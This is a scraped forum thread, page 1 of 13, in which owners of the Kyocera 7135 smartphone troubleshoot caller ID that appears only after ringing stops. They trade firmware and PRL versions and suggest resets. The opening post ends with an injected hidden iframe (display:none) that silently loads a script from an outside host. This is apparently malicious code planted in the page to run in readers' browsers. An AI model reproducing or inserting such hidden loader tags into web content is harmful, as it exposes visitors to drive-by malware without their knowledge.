+ Reply to Thread
Page 1 of 13 1 2 3 4 5 11 ... LastLast

Caller ID on the 7135

I purchased the 7135 with an Alltel setup. I had it switched to Verizon and I am very pleased with it. The one problem I seem to be having is with the caller ID. While the phone is ringing most of the time the caller ID shows only that I have an incoming call. It is not until it stops ringing that I can see the name and number of the person who called. Sometimes I can see the name and number while it is ringing but more times than not, it doesn't show up until after I miss the call. Has this happened to anyone else and do you know a fix?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Caller ID on the 7135

Originally posted by robertfeathers
    I purchased the 7135 with an Alltel setup. I had it switched to Verizon and I am very pleased with it. The one problem I seem to be having is with the caller ID. While the phone is ringing most of the time the caller ID shows only that I have an incoming call. It is not until it stops ringing that I can see the name and number of the person who called. Sometimes I can see the name and number while it is ringing but more times than not, it doesn't show up until after I miss the call. Has this happened to anyone else and do you know a fix?
    How big is your address book? it searches the address book for the name, and depending on the number of entries, and how many numbers there are for each one, it can take a while. If you get another call from the same number, it jumps right to it though. Not sure, but I think it might search the Recent Calls database before it looks in the Address Book database.

Alan

Thank you for your quick response. I only have 225 entries in my phone book. I have tried to wait a ring or two but still no name comes up until the caller hangs up or it goes to voice mail.

Thank you for your quick response. I only have 225 entries in my phone book. I have tried to wait a ring or two but still no name comes up until the caller hangs up or it goes to voice mail.
    This is the same problem (I believe) that was discussed in a tread from a while back that was believed to be the reason verizon held up the release.

Which brings up the question, are the phones kyocera is selling to alltel the old production models that have not gone through the software modifications to get them to Verizon's level?

That is odd. I have 2099 entries, and when callerID is delayed, it is only by a matter of one extra ring cycle. Must be something else.

Alan

Administrator
    do you have any hacks installed? did you just sync this phone up to an old palm db?

could be a bug in the phone. there is a thread on this page that asks everyone to list their firmware. why not stop by it and post your version to see if there is any difference between yours and others. its probably the same, but you never know...

have you tried a soft reset, or warm reset?

finally try a cold boot to restore the phone back to default. then input one or two numbers. have them call you to see if caller id works...

just some ideas...

These aren't "old" phone with "bad" software.

If indeed this is a problem that vzw is having kyo fix in the software it shouldn't be too long before us early adopters get a flash upgrade. I have 170 address in my address book and haven't had any problems with the display.

mz1.0.27
    sz 1.0.13
    prl 50068

Administrator
    Originally posted by dgelfuso
    These aren't "old" phone with "bad" software.
    dont curse the messenger..

these phones are first run units so there is likely to be bugs in them. this is nothing new. dont mean to rattle your cage...

During my tech support calls with vzw i confirmed that one of the version numbers was the same as my Alltel phone. I just can't remember whether it was phone or pda. Sorry, this may muddy the waters even more.

Caller ID question

I am a current 6035 owner, eagerly awaiting the release of the 7135 on the Sprint network. I am curious about the LCD display on the top of the phone. I would like to know if it just displays the number or does it display the name in the address book?

I would also like to know how well does the EIS browser work?
    DatCoolMan
    datcoolman@msn.com

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

CALLER ID

Here is how caller id works.

It displays the name and number if it matches the address book entry, if not it displays the number only.

On the EIS browser, I love it but I also have started us xiino.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Thanks for the help
    DatCoolMan
    datcoolman@msn.com

Same problem, with a tiny address book

I have the same problem with my 7135 (the caller ID number doesn't show up until after the caller hangs up or is transfered to voice mail), and I have only one - yes, one! - entry in my address book. (I've never owned a Palm device before - no doubt I'll spend the next few days entering contact info.)

So if anyone has a solution for this problem, a bunch of us would greatly appreciate it!

Cheers,
    Seth

address book

did you make your 1 entry into the palm or the desktop and then sync?

Try a soft reset after you sync. On my 6035 once i did a soft reset it worked fine. I have not experienced that problem on my 7135.
    GREG HARKINS
    www.bringingfuntoyou.com

I put the entry into the phone and then synced - then I tried a soft reset as you suggested. The caller ID still doesn't come up until after the call attempt ends.

What's interesting is that the ringer changes to a different sound after a ring or two, once the phone realizes that the call is from a number that's in the address book - but the external caller ID display still just shows "Incoming Call" with no name or number.

Thanks,
    Seth

Software info

My software info isn't quite the same as pdageek's:

Phone: MZ1.0.27
    PDA: 1.0.13
    PRL: 50059 (pdageek's is 5006

Could this be the problem?

Thanks,
    Seth

well, looks like you have the ERI (enchanced roaming indicator) PRL (50059) and he has the non-ERI PRL.

Originally posted by ari1979
    well, looks like you have the ERI (enchanced roaming indicator) PRL (50059) and he has the non-ERI PRL.
    PRL 50059 is not an ERI PRL. 50059 is the non ERI PRL for Verizon National Single Rate plan.

Shwemp

caller id

do you have ring by category turned on, it sounds like you do since you got a different ring for that name once it was reconized?

try turning that feature off and see what happens i dont have that feature on and again i get my id like i should.
    GREG HARKINS
    www.bringingfuntoyou.com

+ Reply to Thread
Page 1 of 13 1 2 3 4 5 11 ... LastLast